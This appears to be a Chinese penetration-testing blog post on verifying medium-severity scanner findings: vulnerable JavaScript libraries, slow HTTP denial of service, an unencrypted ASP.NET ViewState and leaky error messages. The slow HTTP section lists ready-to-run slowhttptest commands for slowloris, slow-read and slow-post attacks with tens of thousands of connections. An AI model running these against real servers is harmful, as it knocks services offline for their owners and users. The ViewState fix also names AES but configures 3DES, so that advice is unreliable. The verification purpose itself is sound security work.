天天看點

常見web漏洞(awvs、nessus)驗證方法小記-中危漏洞1.【中危】不安全的Javascript庫(Vulnerable Javascript library)2.【中危】緩慢的HTTP拒絕服務攻擊(Slow HTTP Denial of Service Attack)3.【中危】未加密的__VIEWSTATE參數(Unencrypted__VIEWSTATE parameter)4.【中危】應用程式錯誤(Application error message)

文章目錄

  • 1.【中危】不安全的Javascript庫(Vulnerable Javascript library)
    • 漏洞描述
      • SWFObject庫
      • YUI庫
    • 漏洞危害
    • 漏洞證明
    • 修複建議
  • 2.【中危】緩慢的HTTP拒絕服務攻擊(Slow HTTP Denial of Service Attack)
    • 漏洞描述
    • 漏洞危害
    • 漏洞證明
      • 安裝工具
      • 工具指令
      • 四種方式
        • slow header
        • slow read
        • slow post
        • slowloris
    • 修複建議
  • 3.【中危】未加密的__VIEWSTATE參數(Unencrypted__VIEWSTATE parameter)
    • 漏洞描述
    • 漏洞危害
    • 漏洞證明
      • bp抓包
      • viewstatedecoder2工具解密
    • 修複建議
  • 4.【中危】應用程式錯誤(Application error message)
    • 漏洞描述
    • 漏洞危害
    • 漏洞證明
    • 修複建議

1.【中危】不安全的Javascript庫(Vulnerable Javascript library)

漏洞描述

SWFObject庫

SWFObject是一個免費的開放源代碼工具,用于在網站中嵌入swf内容,SWFObject在Internet Explorer中進行動态嵌入的方法,以使用更友好的W3C方式建立。網站正在使用易受攻擊的Javascript庫,此版本的Javascript庫報告了一個或多個漏洞

YUI庫

Yahoo! UI Library (YUI) 是一個開放源代碼的 JavaScript 函數庫,為了能建立一個高互動的網頁,它采用了AJAX, DHTML 和 DOM 等程式碼技術。它也包含了許多 CSS 資源。網站正在使用不安全的YUI庫,此版本的YUI庫被報告了一個或多個漏洞

漏洞危害

SWF檔案中存在安全漏洞

漏洞證明

用bp抓包通路url,尋找響應包内Javascript庫版本

常見web漏洞(awvs、nessus)驗證方法小記-中危漏洞1.【中危】不安全的Javascript庫(Vulnerable Javascript library)2.【中危】緩慢的HTTP拒絕服務攻擊(Slow HTTP Denial of Service Attack)3.【中危】未加密的__VIEWSTATE參數(Unencrypted__VIEWSTATE parameter)4.【中危】應用程式錯誤(Application error message)

修複建議

更新到最新版本

2.【中危】緩慢的HTTP拒絕服務攻擊(Slow HTTP Denial of Service Attack)

漏洞描述

對任何一個開放了http通路的伺服器,建立一個連接配接,指定一個比較大的content-length,然後以非常低的速度發包HTTP,在連接配接不斷開的情況下,協定要求伺服器在處理請求之前将其完全接收。如果HTTP請求未完成,或者傳輸速率很低,則伺服器将使其資源繁忙,以等待其餘資料。如果伺服器使過多的資源繁忙,則會導緻拒絕服務

漏洞危害

攻擊者可通過一台機器關閉另一台機器的Web伺服器,并且帶寬最小,并且對不相關的服務和端口産生副作用

漏洞證明

利用工具slowhttptest

安裝工具

apt-get install slowhttptest

工具指令

- a  —開始開始值範圍說明符用于範圍頭測試
- b 将位元組限制的範圍說明符用于範圍頭測試
– c 的連接配接數限制為65539
– d proxy host:port  用于指導所有流量通過web代理
– e proxy host:port  端口用于指導隻有探針交通通過web代理
– h,B,R或x   指定減緩在頭部分或在消息體,- R 允許範圍檢驗,使慢讀測試- x
– g 生成統計資料在CSV和HTML格式,模式是緩慢的xxx。csv / html,其中xxx是時間和日期
– i seconds   秒間隔跟蹤資料在幾秒鐘内,每個連接配接
– k 管道因子次數重複請求在同一連接配接慢讀測試如果伺服器支援HTTP管道内襯。
– l 在幾秒鐘内,秒測試時間
– n 秒間隔從接收緩沖區讀取操作
– o 檔案定義輸出檔案路徑和/或名稱,如果指定有效- g
– p 秒逾時等待HTTP響應在探頭連接配接後,伺服器被認為是不可通路的
– r seconds   連接配接速度
– s 位元組值的内容長度标題詳細說明,如果指定- b
– t verb   自定義
– u URL    目标URL,相同的格式鍵入浏覽器,e。g https://host[:port]/
– v level  冗長等級0 – 4的日志
– w 位元組範圍廣告的視窗大小會選擇從
– x 位元組最大長度的跟蹤資料結束
– y 位元組範圍廣告的視窗大小會選擇從
– z 位元組從接收緩沖區讀取位元組與單一的read()操作
           

四種方式

slow header

slowhttptest -c 65500 -H -i 10 -r 200 -s 8192 -t SLOWHEADER -u http://xxxx:8889

slow read

slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://xxxx -p 5 -l 350 -e x.x.x.x:8080

slowhttptest -c 65500 -X -r 1000 -w 10 -y 20 -t SLOWREAD -n 5 -z 32 -u http://xxxx:8889

slow post

slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://xxxx -x 10 -p 3

slowhttptest -c 65500 -B -i 10 -r 200 -s 8192 -t SLOWBODY -u http://xxxx:8889

slowloris

slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://xxxx -x 24 -p 3

slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://xxxx -x 24 -p 3

修複建議

1.可配置從一個用戶端接收HTTP頭部和HTTPbody的逾時時間和最小速率

2.配置各種不同粒度的HTTP請求門檻值

3.将web伺服器更新到最新版

3.【中危】未加密的__VIEWSTATE參數(Unencrypted__VIEWSTATE parameter)

漏洞描述

’__VIEWSTATE參數未加密。為了減少某人攔截存儲在ViewState中的資訊的機會,最好對ViewState進行加密。為此,請将machineKey驗證類型設定為AES。這訓示ASP.NET使用“進階加密标準”對ViewState值進行加密

漏洞危害

可能的敏感資訊洩露

漏洞證明

bp抓包

可在響應包頁面的viewstate中發現,自動解密

常見web漏洞(awvs、nessus)驗證方法小記-中危漏洞1.【中危】不安全的Javascript庫(Vulnerable Javascript library)2.【中危】緩慢的HTTP拒絕服務攻擊(Slow HTTP Denial of Service Attack)3.【中危】未加密的__VIEWSTATE參數(Unencrypted__VIEWSTATE parameter)4.【中危】應用程式錯誤(Application error message)

viewstatedecoder2工具解密

常見web漏洞(awvs、nessus)驗證方法小記-中危漏洞1.【中危】不安全的Javascript庫(Vulnerable Javascript library)2.【中危】緩慢的HTTP拒絕服務攻擊(Slow HTTP Denial of Service Attack)3.【中危】未加密的__VIEWSTATE參數(Unencrypted__VIEWSTATE parameter)4.【中危】應用程式錯誤(Application error message)

修複建議

在 Web.Config 檔案的元素之下,添加下面這一行:

<system.web> <machinekey validation="3DES"></machinekey></system.web>

4.【中危】應用程式錯誤(Application error message)

漏洞描述

應用程式錯誤或警告消息可能會将有關應用程式内部工作的敏感資訊暴露給攻擊者,可能洩露敏感資訊。該消息還可能包含産生未處理異常的檔案的位置

漏洞危害

錯誤消息可能會洩露可用于更新攻擊的敏感資訊

漏洞證明

通路構造好的檔案路徑,bp抓包

常見web漏洞(awvs、nessus)驗證方法小記-中危漏洞1.【中危】不安全的Javascript庫(Vulnerable Javascript library)2.【中危】緩慢的HTTP拒絕服務攻擊(Slow HTTP Denial of Service Attack)3.【中危】未加密的__VIEWSTATE參數(Unencrypted__VIEWSTATE parameter)4.【中危】應用程式錯誤(Application error message)

修複建議

驗證此頁面上是否顯示錯誤或警告消息,并正确配置應用程式以将錯誤記錄到檔案中,而不是向使用者顯示錯誤

繼續閱讀